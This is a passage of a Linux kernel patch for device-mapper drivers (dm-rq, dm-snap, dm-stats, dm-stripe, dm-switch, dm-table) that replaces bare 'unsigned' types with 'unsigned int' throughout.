+diff --git a/drivers/md/dm-rq.c b/drivers/md/dm-rq.c
+index a41209a43506c..80f46e01bca44 100644
+--- a/drivers/md/dm-rq.c
++++ b/drivers/md/dm-rq.c
+@@ -23,33 +23,33 @@ struct dm_rq_target_io {
+ 	union map_info info;
+ 	struct dm_stats_aux stats_aux;
+ 	unsigned long duration_jiffies;
+-	unsigned n_sectors;
+-	unsigned completed;
++	unsigned int n_sectors;
++	unsigned int completed;
+ };
+ 
+ #define DM_MQ_NR_HW_QUEUES 1
+ #define DM_MQ_QUEUE_DEPTH 2048
+-static unsigned dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
+-static unsigned dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
++static unsigned int dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
++static unsigned int dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
+ 
+ /*
+  * Request-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_REQUEST_BASED_IOS	256
+-static unsigned reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
++static unsigned int reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
+ 
+-unsigned dm_get_reserved_rq_based_ios(void)
++unsigned int dm_get_reserved_rq_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_rq_based_ios,
+ 				     RESERVED_REQUEST_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ 
+-static unsigned dm_get_blk_mq_nr_hw_queues(void)
++static unsigned int dm_get_blk_mq_nr_hw_queues(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_nr_hw_queues, 1, 32);
+ }
+ 
+-static unsigned dm_get_blk_mq_queue_depth(void)
++static unsigned int dm_get_blk_mq_queue_depth(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_queue_depth,
+ 				     DM_MQ_QUEUE_DEPTH, BLK_MQ_MAX_DEPTH);
+diff --git a/drivers/md/dm-rq.h b/drivers/md/dm-rq.h
+index 1eea0da641db5..2c97ad1451400 100644
+--- a/drivers/md/dm-rq.h
++++ b/drivers/md/dm-rq.h
+@@ -38,7 +38,7 @@ void dm_stop_queue(struct request_queue *q);
+ 
+ void dm_mq_kick_requeue_list(struct mapped_device *md);
+ 
+-unsigned dm_get_reserved_rq_based_ios(void);
++unsigned int dm_get_reserved_rq_based_ios(void);
+ 
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_show(struct mapped_device *md, char *buf);
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_store(struct mapped_device *md,
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 680cc05ec6542..5176810f5d243 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -303,7 +303,7 @@ static int read_header(struct pstore *ps, int *new_snapshot)
+ {
+ 	int r;
+ 	struct disk_header *dh;
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 	int chunk_size_supplied = 1;
+ 	char *chunk_err;
+ 
+@@ -895,11 +895,11 @@ err_workqueue:
+ 	return r;
+ }
+ 
+-static unsigned persistent_status(struct dm_exception_store *store,
++static unsigned int persistent_status(struct dm_exception_store *store,
+ 				  status_type_t status, char *result,
+-				  unsigned maxlen)
++				  unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-snap-transient.c b/drivers/md/dm-snap-transient.c
+index 0e0ae4c36b374..d83a0565bd101 100644
+--- a/drivers/md/dm-snap-transient.c
++++ b/drivers/md/dm-snap-transient.c
+@@ -84,11 +84,11 @@ static int transient_ctr(struct dm_exception_store *store, char *options)
+ 	return 0;
+ }
+ 
+-static unsigned transient_status(struct dm_exception_store *store,
++static unsigned int transient_status(struct dm_exception_store *store,
+ 				 status_type_t status, char *result,
+-				 unsigned maxlen)
++				 unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index d1c2f84d27e36..c64d987c544d7 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -41,7 +41,7 @@ static const char dm_snapshot_merge_target_name[] = "snapshot-merge";
+ 
+ struct dm_exception_table {
+ 	uint32_t hash_mask;
+-	unsigned hash_shift;
++	unsigned int hash_shift;
+ 	struct hlist_bl_head *table;
+ };
+ 
+@@ -106,7 +106,7 @@ struct dm_snapshot {
+ 	/* The on disk metadata handler */
+ 	struct dm_exception_store *store;
+ 
+-	unsigned in_progress;
++	unsigned int in_progress;
+ 	struct wait_queue_head in_progress_wait;
+ 
+ 	struct dm_kcopyd_client *kcopyd_client;
+@@ -161,7 +161,7 @@ struct dm_snapshot {
+  */
+ #define DEFAULT_COW_THRESHOLD 2048
+ 
+-static unsigned cow_threshold = DEFAULT_COW_THRESHOLD;
++static unsigned int cow_threshold = DEFAULT_COW_THRESHOLD;
+ module_param_named(snapshot_cow_threshold, cow_threshold, uint, 0644);
+ MODULE_PARM_DESC(snapshot_cow_threshold, "Maximum number of chunks being copied on write");
+ 
+@@ -324,7 +324,7 @@ struct origin {
+ struct dm_origin {
+ 	struct dm_dev *dev;
+ 	struct dm_target *ti;
+-	unsigned split_boundary;
++	unsigned int split_boundary;
+ 	struct list_head hash_list;
+ };
+ 
+@@ -377,7 +377,7 @@ static void exit_origin_hash(void)
+ 	kfree(_dm_origins);
+ }
+ 
+-static unsigned origin_hash(struct block_device *bdev)
++static unsigned int origin_hash(struct block_device *bdev)
+ {
+ 	return bdev->bd_dev & ORIGIN_MASK;
+ }
+@@ -652,7 +652,7 @@ static void dm_exception_table_unlock(struct dm_exception_table_lock *lock)
+ }
+ 
+ static int dm_exception_table_init(struct dm_exception_table *et,
+-				   uint32_t size, unsigned hash_shift)
++				   uint32_t size, unsigned int hash_shift)
+ {
+ 	unsigned int i;
+ 
+@@ -850,7 +850,7 @@ static int dm_add_exception(void *context, chunk_t old, chunk_t new)
+ static uint32_t __minimum_chunk_size(struct origin *o)
+ {
+ 	struct dm_snapshot *snap;
+-	unsigned chunk_size = rounddown_pow_of_two(UINT_MAX);
++	unsigned int chunk_size = rounddown_pow_of_two(UINT_MAX);
+ 
+ 	if (o)
+ 		list_for_each_entry(snap, &o->snapshots, list)
+@@ -1010,7 +1010,7 @@ out:
+ }
+ 
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned chunk_size);
++			       sector_t sector, unsigned int chunk_size);
+ 
+ static void merge_callback(int read_err, unsigned long write_err,
+ 			   void *context);
+@@ -1183,7 +1183,7 @@ static int parse_snapshot_features(struct dm_arg_set *as, struct dm_snapshot *s,
+ 				   struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -1241,7 +1241,7 @@ static int snapshot_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	int r = -EINVAL;
+ 	char *origin_path, *cow_path;
+ 	dev_t origin_dev, cow_dev;
+-	unsigned args_used, num_flush_bios = 1;
++	unsigned int args_used, num_flush_bios = 1;
+ 	fmode_t origin_mode = FMODE_READ;
+ 
+ 	if (argc < 4) {
+@@ -2315,11 +2315,11 @@ static void snapshot_merge_resume(struct dm_target *ti)
+ }
+ 
+ static void snapshot_status(struct dm_target *ti, status_type_t type,
+-			    unsigned status_flags, char *result, unsigned maxlen)
++			    unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_snapshot *snap = ti->private;
+-	unsigned num_features;
++	unsigned int num_features;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -2592,7 +2592,7 @@ again:
+  * size must be a multiple of merging_snap's chunk_size.
+  */
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned size)
++			       sector_t sector, unsigned int size)
+ {
+ 	int must_wait = 0;
+ 	sector_t n;
+@@ -2668,7 +2668,7 @@ static void origin_dtr(struct dm_target *ti)
+ static int origin_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct dm_origin *o = ti->private;
+-	unsigned available_sectors;
++	unsigned int available_sectors;
+ 
+ 	bio_set_dev(bio, o->dev->bdev);
+ 
+@@ -2679,7 +2679,7 @@ static int origin_map(struct dm_target *ti, struct bio *bio)
+ 		return DM_MAPIO_REMAPPED;
+ 
+ 	available_sectors = o->split_boundary -
+-		((unsigned)bio->bi_iter.bi_sector & (o->split_boundary - 1));
++		((unsigned int)bio->bi_iter.bi_sector & (o->split_boundary - 1));
+ 
+ 	if (bio_sectors(bio) > available_sectors)
+ 		dm_accept_partial_bio(bio, available_sectors);
+@@ -2713,7 +2713,7 @@ static void origin_postsuspend(struct dm_target *ti)
+ }
+ 
+ static void origin_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_origin *o = ti->private;
+ 
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index d12ba9bce145d..7eeb3c2a2492b 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -42,12 +42,12 @@ struct dm_stat_shared {
+ struct dm_stat {
+ 	struct list_head list_entry;
+ 	int id;
+-	unsigned stat_flags;
++	unsigned int stat_flags;
+ 	size_t n_entries;
+ 	sector_t start;
+ 	sector_t end;
+ 	sector_t step;
+-	unsigned n_histogram_entries;
++	unsigned int n_histogram_entries;
+ 	unsigned long long *histogram_boundaries;
+ 	const char *program_id;
+ 	const char *aux_data;
+@@ -63,7 +63,7 @@ struct dm_stat {
+ 
+ struct dm_stats_last_position {
+ 	sector_t last_sector;
+-	unsigned last_rw;
++	unsigned int last_rw;
+ };
+ 
+ /*
+@@ -255,8 +255,8 @@ static void dm_stats_recalc_precise_timestamps(struct dm_stats *stats)
+ }
+ 
+ static int dm_stats_create(struct dm_stats *stats, sector_t start, sector_t end,
+-			   sector_t step, unsigned stat_flags,
+-			   unsigned n_histogram_entries,
++			   sector_t step, unsigned int stat_flags,
++			   unsigned int n_histogram_entries,
+ 			   unsigned long long *histogram_boundaries,
+ 			   const char *program_id, const char *aux_data,
+ 			   void (*suspend_callback)(struct mapped_device *),
+@@ -475,11 +475,11 @@ do_sync_free:
+ }
+ 
+ static int dm_stats_list(struct dm_stats *stats, const char *program,
+-			 char *result, unsigned maxlen)
++			 char *result, unsigned int maxlen)
+ {
+ 	struct dm_stat *s;
+ 	sector_t len;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	/*
+ 	 * Output format:
+@@ -499,7 +499,7 @@ static int dm_stats_list(struct dm_stats *stats, const char *program,
+ 			if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 				DMEMIT(" precise_timestamps");
+ 			if (s->n_histogram_entries) {
+-				unsigned i;
++				unsigned int i;
+ 				DMEMIT(" histogram:");
+ 				for (i = 0; i < s->n_histogram_entries; i++) {
+ 					if (i)
+@@ -523,7 +523,7 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	 * This is racy, but so is part_round_stats_single.
+ 	 */
+ 	unsigned long long now, difference;
+-	unsigned in_flight_read, in_flight_write;
++	unsigned int in_flight_read, in_flight_write;
+ 
+ 	if (likely(!(s->stat_flags & STAT_PRECISE_TIMESTAMPS)))
+ 		now = jiffies;
+@@ -534,8 +534,8 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	if (!difference)
+ 		return;
+ 
+-	in_flight_read = (unsigned)atomic_read(&shared->in_flight[READ]);
+-	in_flight_write = (unsigned)atomic_read(&shared->in_flight[WRITE]);
++	in_flight_read = (unsigned int)atomic_read(&shared->in_flight[READ]);
++	in_flight_write = (unsigned int)atomic_read(&shared->in_flight[WRITE]);
+ 	if (in_flight_read)
+ 		p->io_ticks[READ] += difference;
+ 	if (in_flight_write)
+@@ -596,9 +596,9 @@ static void dm_stat_for_entry(struct dm_stat *s, size_t entry,
+ 			duration = stats_aux->duration_ns;
+ 		}
+ 		if (s->n_histogram_entries) {
+-			unsigned lo = 0, hi = s->n_histogram_entries + 1;
++			unsigned int lo = 0, hi = s->n_histogram_entries + 1;
+ 			while (lo + 1 < hi) {
+-				unsigned mid = (lo + hi) / 2;
++				unsigned int mid = (lo + hi) / 2;
+ 				if (s->histogram_boundaries[mid - 1] > duration) {
+ 					hi = mid;
+ 				} else {
+@@ -656,7 +656,7 @@ static void __dm_stat_bio(struct dm_stat *s, int bi_rw,
+ }
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *stats_aux)
+ {
+@@ -745,7 +745,7 @@ static void __dm_stat_init_temporary_percpu_totals(struct dm_stat_shared *shared
+ 		shared->tmp.io_ticks_total += READ_ONCE(p->io_ticks_total);
+ 		shared->tmp.time_in_queue += READ_ONCE(p->time_in_queue);
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++)
+ 				shared->tmp.histogram[i] += READ_ONCE(p->histogram[i]);
+ 		}
+@@ -779,7 +779,7 @@ static void __dm_stat_clear(struct dm_stat *s, size_t idx_start, size_t idx_end,
+ 		p->time_in_queue -= shared->tmp.time_in_queue;
+ 		local_irq_enable();
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				local_irq_disable();
+ 				p = &s->stat_percpu[smp_processor_id()][x];
+@@ -816,7 +816,7 @@ static int dm_stats_clear(struct dm_stats *stats, int id)
+ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long long j)
+ {
+ 	unsigned long long result;
+-	unsigned mult;
++	unsigned int mult;
+ 
+ 	if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 		return j;
+@@ -836,9 +836,9 @@ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long
+ 
+ static int dm_stats_print(struct dm_stats *stats, int id,
+ 			  size_t idx_start, size_t idx_len,
+-			  bool clear, char *result, unsigned maxlen)
++			  bool clear, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_stat *s;
+ 	size_t x;
+ 	sector_t start, end, step;
+@@ -894,7 +894,7 @@ static int dm_stats_print(struct dm_stats *stats, int id,
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[READ]),
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[WRITE]));
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				DMEMIT("%s%llu", !i ? " " : ":", shared->tmp.histogram[i]);
+ 			}
+@@ -943,11 +943,11 @@ static int dm_stats_set_aux(struct dm_stats *stats, int id, const char *aux_data
+ 	return 0;
+ }
+ 
+-static int parse_histogram(const char *h, unsigned *n_histogram_entries,
++static int parse_histogram(const char *h, unsigned int *n_histogram_entries,
+ 			   unsigned long long **histogram_boundaries)
+ {
+ 	const char *q;
+-	unsigned n;
++	unsigned int n;
+ 	unsigned long long last;
+ 
+ 	*n_histogram_entries = 1;
+@@ -982,23 +982,23 @@ static int parse_histogram(const char *h, unsigned *n_histogram_entries,
+ }
+ 
+ static int message_stats_create(struct mapped_device *md,
+-				unsigned argc, char **argv,
+-				char *result, unsigned maxlen)
++				unsigned int argc, char **argv,
++				char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	int id;
+ 	char dummy;
+ 	unsigned long long start, end, len, step;
+-	unsigned divisor;
++	unsigned int divisor;
+ 	const char *program_id, *aux_data;
+-	unsigned stat_flags = 0;
++	unsigned int stat_flags = 0;
+ 
+-	unsigned n_histogram_entries = 0;
++	unsigned int n_histogram_entries = 0;
+ 	unsigned long long *histogram_boundaries = NULL;
+ 
+ 	struct dm_arg_set as, as_backup;
+ 	const char *a;
+-	unsigned feature_args;
++	unsigned int feature_args;
+ 
+ 	/*
+ 	 * Input format:
+@@ -1107,7 +1107,7 @@ ret:
+ }
+ 
+ static int message_stats_delete(struct mapped_device *md,
+-				unsigned argc, char **argv)
++				unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1122,7 +1122,7 @@ static int message_stats_delete(struct mapped_device *md,
+ }
+ 
+ static int message_stats_clear(struct mapped_device *md,
+-			       unsigned argc, char **argv)
++			       unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1137,8 +1137,8 @@ static int message_stats_clear(struct mapped_device *md,
+ }
+ 
+ static int message_stats_list(struct mapped_device *md,
+-			      unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++			      unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	const char *program = NULL;
+@@ -1160,8 +1160,8 @@ static int message_stats_list(struct mapped_device *md,
+ }
+ 
+ static int message_stats_print(struct mapped_device *md,
+-			       unsigned argc, char **argv, bool clear,
+-			       char *result, unsigned maxlen)
++			       unsigned int argc, char **argv, bool clear,
++			       char *result, unsigned int maxlen)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1187,7 +1187,7 @@ static int message_stats_print(struct mapped_device *md,
+ }
+ 
+ static int message_stats_set_aux(struct mapped_device *md,
+-				 unsigned argc, char **argv)
++				 unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1201,8 +1201,8 @@ static int message_stats_set_aux(struct mapped_device *md,
+ 	return dm_stats_set_aux(dm_get_stats(md), id, argv[2]);
+ }
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen)
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index ee32b099f1cf7..c6728c8b41594 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -26,11 +26,11 @@ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen);
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen);
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *aux);
+ 
+diff --git a/drivers/md/dm-stripe.c b/drivers/md/dm-stripe.c
+index baa085cc67bde..a81ed080730a7 100644
+--- a/drivers/md/dm-stripe.c
++++ b/drivers/md/dm-stripe.c
+@@ -273,7 +273,7 @@ static int stripe_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	uint32_t stripe;
+-	unsigned target_bio_nr;
++	unsigned int target_bio_nr;
+ 
+ 	if (bio->bi_opf & REQ_PREFLUSH) {
+ 		target_bio_nr = dm_bio_get_target_bio_nr(bio);
+@@ -359,7 +359,7 @@ static size_t stripe_dax_recovery_write(struct dm_target *ti, pgoff_t pgoff,
+  */
+ 
+ static void stripe_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct stripe_c *sc = (struct stripe_c *) ti->private;
+ 	unsigned int sz = 0;
+@@ -406,7 +406,7 @@ static void stripe_status(struct dm_target *ti, status_type_t type,
+ static int stripe_end_io(struct dm_target *ti, struct bio *bio,
+ 		blk_status_t *error)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	char major_minor[16];
+ 	struct stripe_c *sc = ti->private;
+ 
+@@ -444,7 +444,7 @@ static int stripe_iterate_devices(struct dm_target *ti,
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	int ret = 0;
+-	unsigned i = 0;
++	unsigned int i = 0;
+ 
+ 	do {
+ 		ret = fn(ti, sc->stripe[i].dev,
+@@ -459,7 +459,7 @@ static void stripe_io_hints(struct dm_target *ti,
+ 			    struct queue_limits *limits)
+ {
+ 	struct stripe_c *sc = ti->private;
+-	unsigned chunk_size = sc->chunk_size << SECTOR_SHIFT;
++	unsigned int chunk_size = sc->chunk_size << SECTOR_SHIFT;
+ 
+ 	blk_limits_io_min(limits, chunk_size);
+ 	blk_limits_io_opt(limits, chunk_size * sc->stripes);
+diff --git a/drivers/md/dm-switch.c b/drivers/md/dm-switch.c
+index 534dc2ca8bb06..f734b5a097443 100644
+--- a/drivers/md/dm-switch.c
++++ b/drivers/md/dm-switch.c
+@@ -38,9 +38,9 @@ struct switch_path {
+ struct switch_ctx {
+ 	struct dm_target *ti;
+ 
+-	unsigned nr_paths;		/* Number of paths in path_list. */
++	unsigned int nr_paths;		/* Number of paths in path_list. */
+ 
+-	unsigned region_size;		/* Region size in 512-byte sectors */
++	unsigned int region_size;		/* Region size in 512-byte sectors */
+ 	unsigned long nr_regions;	/* Number of regions making up the device */
+ 	signed char region_size_bits;	/* log2 of region_size or -1 */
+ 
+@@ -56,8 +56,8 @@ struct switch_ctx {
+ 	struct switch_path path_list[];
+ };
+ 
+-static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_paths,
+-					   unsigned region_size)
++static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned int nr_paths,
++					   unsigned int region_size)
+ {
+ 	struct switch_ctx *sctx;
+ 
+@@ -73,7 +73,7 @@ static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_pat
+ 	return sctx;
+ }
+ 
+-static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
++static int alloc_region_table(struct dm_target *ti, unsigned int nr_paths)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t nr_regions = ti->len;
+@@ -124,7 +124,7 @@ static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
+ }
+ 
+ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr,
+-				unsigned long *region_index, unsigned *bit)
++				unsigned long *region_index, unsigned int *bit)
+ {
+ 	if (sctx->region_entries_per_slot_bits >= 0) {
+ 		*region_index = region_nr >> sctx->region_entries_per_slot_bits;
+@@ -137,10 +137,10 @@ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr
+ 	*bit *= sctx->region_table_entry_bits;
+ }
+ 
+-static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
++static unsigned int switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+ 
+@@ -151,9 +151,9 @@ static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long
+ /*
+  * Find which path to use at given offset.
+  */
+-static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
++static unsigned int switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ {
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 	sector_t p;
+ 
+ 	p = offset;
+@@ -172,10 +172,10 @@ static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ }
+ 
+ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long region_nr,
+-				      unsigned value)
++				      unsigned int value)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 	region_table_slot_t pte;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+@@ -191,7 +191,7 @@ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long reg
+  */
+ static void initialise_region_table(struct switch_ctx *sctx)
+ {
+-	unsigned path_nr = 0;
++	unsigned int path_nr = 0;
+ 	unsigned long region_nr;
+ 
+ 	for (region_nr = 0; region_nr < sctx->nr_regions; region_nr++) {
+@@ -249,7 +249,7 @@ static void switch_dtr(struct dm_target *ti)
+  * Optional args are to allow for future extension: currently this
+  * parameter must be 0.
+  */
+-static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int switch_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	static const struct dm_arg _args[] = {
+ 		{1, (KMALLOC_MAX_SIZE - sizeof(struct switch_ctx)) / sizeof(struct switch_path), "Invalid number of paths"},
+@@ -259,7 +259,7 @@ static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	struct switch_ctx *sctx;
+ 	struct dm_arg_set as;
+-	unsigned nr_paths, region_size, nr_optional_args;
++	unsigned int nr_paths, region_size, nr_optional_args;
+ 	int r;
+ 
+ 	as.argc = argc;
+@@ -320,7 +320,7 @@ static int switch_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t offset = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-	unsigned path_nr = switch_get_path_nr(sctx, offset);
++	unsigned int path_nr = switch_get_path_nr(sctx, offset);
+ 
+ 	bio_set_dev(bio, sctx->path_list[path_nr].dmdev->bdev);
+ 	bio->bi_iter.bi_sector = sctx->path_list[path_nr].start + offset;
+@@ -371,9 +371,9 @@ static __always_inline unsigned long parse_hex(const char **string)
+ }
+ 
+ static int process_set_region_mappings(struct switch_ctx *sctx,
+-				       unsigned argc, char **argv)
++				       unsigned int argc, char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	unsigned long region_index = 0;
+ 
+ 	for (i = 1; i < argc; i++) {
+@@ -466,8 +466,8 @@ static int process_set_region_mappings(struct switch_ctx *sctx,
+  *
+  * Only set_region_mappings is supported.
+  */
+-static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int switch_message(struct dm_target *ti, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	static DEFINE_MUTEX(message_mutex);
+ 
+@@ -487,10 +487,10 @@ static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void switch_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	int path_nr;
+ 
+ 	switch (type) {
+@@ -519,7 +519,7 @@ static void switch_status(struct dm_target *ti, status_type_t type,
+ static int switch_prepare_ioctl(struct dm_target *ti, struct block_device **bdev)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 
+ 	path_nr = switch_get_path_nr(sctx, 0);
+ 
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 078da18bb86d8..32b2d3b99d786 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -126,7 +126,7 @@ static int alloc_targets(struct dm_table *t, unsigned int num)
+ }
+ 
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md)
++		    unsigned int num_targets, struct mapped_device *md)
+ {
+ 	struct dm_table *t = kzalloc(sizeof(*t), GFP_KERNEL);
+ 
+@@ -470,10 +470,10 @@ static int adjoin(struct dm_table *t, struct dm_target *ti)
+  * On the other hand, dm-switch needs to process bulk data using messages and
+  * excessive use of GFP_NOIO could cause trouble.
+  */
+-static char **realloc_argv(unsigned *size, char **old_argv)
++static char **realloc_argv(unsigned int *size, char **old_argv)
+ {
+ 	char **argv;
+-	unsigned new_size;
++	unsigned int new_size;
+ 	gfp_t gfp;
+ 
+ 	if (*size) {
+@@ -499,7 +499,7 @@ static char **realloc_argv(unsigned *size, char **old_argv)
+ int dm_split_args(int *argc, char ***argvp, char *input)
+ {
+ 	char *start, *end = input, *out, **argv = NULL;
+-	unsigned array_size = 0;
++	unsigned int array_size = 0;
+ 
+ 	*argc = 0;
+ 
+@@ -732,9 +732,8 @@ int dm_table_add_target(struct dm_table *t, const char *type,
+ /*
+  * Target argument parsing helpers.
+  */
+-static int validate_next_arg(const struct dm_arg *arg,
+-			     struct dm_arg_set *arg_set,
+-			     unsigned *value, char **error, unsigned grouped)
++static int validate_next_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
++			     unsigned int *value, char **error, unsigned int grouped)
+ {
+ 	const char *arg_str = dm_shift_arg(arg_set);
+ 	char dummy;
+@@ -752,14 +751,14 @@ static int validate_next_arg(const struct dm_arg *arg,
+ }
+ 
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error)
++		unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 0);
+ }
+ EXPORT_SYMBOL(dm_read_arg);
+ 
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *value, char **error)
++		      unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 1);
+ }
+@@ -780,7 +779,7 @@ const char *dm_shift_arg(struct dm_arg_set *as)
+ }
